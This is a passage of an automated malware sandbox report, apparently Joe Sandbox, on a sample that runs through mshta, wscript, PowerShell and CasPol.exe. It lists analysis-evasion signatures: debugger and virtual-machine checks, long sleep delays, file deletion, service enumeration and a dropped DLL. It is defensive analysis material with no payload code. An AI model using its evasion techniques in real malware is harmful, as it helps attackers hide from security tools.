                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0040E54F Sleep,ExitProcess,13_2_0040E54F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,13_2_004198C2
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4472Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5296Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6003Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3623Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1036Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 613Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4904Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4891Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 9643Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\blaytqul\blaytqul.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeAPI coverage: 8.8 %
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7756Thread sleep time: -15679732462653109s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7672Thread sleep count: 6003 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7704Thread sleep time: -9223372036854770s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7676Thread sleep count: 3623 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8020Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8084Thread sleep count: 4904 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8080Thread sleep count: 4891 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8112Thread sleep time: -15679732462653109s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 4484Thread sleep count: 343 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 4484Thread sleep time: -1029000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 4484Thread sleep count: 9643 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 4484Thread sleep time: -28929000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,13_2_0040B335
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,13_2_0041B42F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,13_2_0040B53A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,13_2_004089A9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00406AC2 FindFirstFileW,FindNextFileW,13_2_00406AC2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,13_2_00407A8C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,13_2_00418C69
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,13_2_00408DA7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,13_2_00406F06
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: powershell.exe, 00000003.00000002.1707345310.0000000004F86000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                    Source: mshta.exe, 00000000.00000002.1693659509.0000000000B05000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: powershell.exe, 00000003.00000002.1707345310.0000000004F86000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                    Source: CasPol.exe, 0000000D.00000002.4110277483.0000000000E62000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll4
                    Source: powershell.exe, 00000001.00000002.1829521422.0000000007F4F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1826446368.0000000007131000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: powershell.exe, 00000003.00000002.1707345310.0000000004F86000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                    Source: powershell.exe, 00000009.00000002.2099966491.00000000074FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeAPI call chain: ExitProcess graph end nodegraph_13-46801
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_0043A65D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,13_2_0041BCE3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00442554 mov eax, dword ptr fs:[00000030h]13_2_00442554
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0044E92E GetProcessHeap,13_2_0044E92E
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00434168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_00434168
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_0043A65D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00433B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_00433B44
